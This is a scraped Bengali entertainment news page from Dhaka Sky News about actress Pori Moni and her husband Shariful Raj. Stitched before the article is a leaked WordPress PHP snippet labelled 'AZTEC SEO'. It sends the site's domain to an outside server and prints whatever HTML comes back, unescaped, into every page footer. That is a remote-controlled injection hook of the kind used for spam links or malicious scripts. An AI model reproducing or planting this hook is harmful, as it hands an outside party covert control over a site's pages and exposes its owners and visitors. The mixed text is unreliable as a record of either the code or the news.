/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পরীমনি অবশেষে ফিরে গেলেন রাজের ঘরে | Dhaka Sky News

শেখ হাসিনার নির্দেশনা বাস্তবায়নে ছাত্রলীগ দৃঢ়প্রতিজ্ঞ : সাইফুল

আগের সংবাদ

১৮ হাজারের অধিক কর্মী ছাঁটাই করবে অ্যামাজন

পরের সংবাদ

পরীমনি অবশেষে ফিরে গেলেন রাজের ঘরে

ঢাকা স্কাইনিউজ বিনোদন

প্রকাশিত: January 5, 2023 , 11:43 am

ঢাকাই সিনেমার আলোচিত অভিনেত্রী পরীমনি অবশেষে স্বামী শরিফুল রাজের ঘরে ফিরে গেছেন। বিষয়টি জানিয়েছেন আরেক অভিনেত্রী শিরিন শিলা। বুধবার রাত পৌনে ১২টার দিকে শিলা তার ভেরিফায়েড ফেসবুক পেজে কয়েকটি ছবি পোস্ট করেন। সেখানে দেখা যায়, পরীমনি ও রাজ ভিডিওকলে শিরিন শিলার সঙ্গে কথা বলছেন। এ সময় তাদের পুত্র রাজ্যকেও দেখা গেছে ওই ছবিতে।

শিরিন শিলা ফেসবুক পোস্টে লিখেছেন— অভিনন্দন দোস্ত পরীমনি। সব ভুল বোঝাবুঝির অবসান ঘটিয়ে আবার নতুন করে সুখের সংসার গড়ে তোলার জন্য। যারা পরিমনির সংসারে ভাঙন দেখে খুশি হয়েছিলেন, তারা বিষ খেয়ে মরে যাও। কারণ যারা মানুষের সুখ দেখতে পারে না, তাদের বেঁচে থাকার কোনো অধিকার নেই। পরী-রাজ, রাজ্যের জয় হোক।

অবশ্য বৃহস্পতিবার সকালে গণমাধ্যমের সঙ্গে আলাপকালে পরীমনি বিষয়টিকে আন্দাজি বলে উড়িয়ে দিয়েছেন। তিনি জানান, ‘আন্দাজে নিউজ করা হয়েছে।’

উল্লেখ্য, এর আগে নতুন বছরের প্রথম প্রহরে ফেসবুকে দুটি ছবি প্রকাশ করেন পরীমনি। যেখানে তার বিছানা ও কোল বালিশে রক্তের দাগ রয়েছে। ধারণা করা হয়, রাজের সঙ্গে তার হাতাহাতি থেকেই ঘটনাটি ঘটেছে। ঘটনার বিস্তারিত না জানিয়ে পরীমনি ছবি দুটির ক্যাপশনে লেখেন— ‘হ্যাপি নিউ ইয়ার। প্রেস কনফারেন্স টুমরো… লোডিং।’ যদিও পরীমনি এখনো সেই প্রেস কনফারেন্স করেননি।

২০২১ সালের ১৭ অক্টোবর গোপনে বিয়ে করেন পরীমনি ও অভিনেতা শরিফুল রাজ। মাত্র ৭ দিনের পরিচয়ে তারা বিয়ে করেছিলেন। ২০২২ সালের ১০ জানুয়ারি সেই খবর প্রকাশ্যে আনেন তারা। একই দিন সন্তান ধারণের বার্তাটিও দেন এ দম্পতি। এর পর সে বছরের ২২ জানুয়ারি পারিবারিক আয়োজনে বিয়ের আনুষ্ঠানিকতা সারেন। গত ১০ আগস্ট তাদের ঘর আলো করে আসে পুত্রসন্তান শাহীম মুহাম্মদ রাজ্য।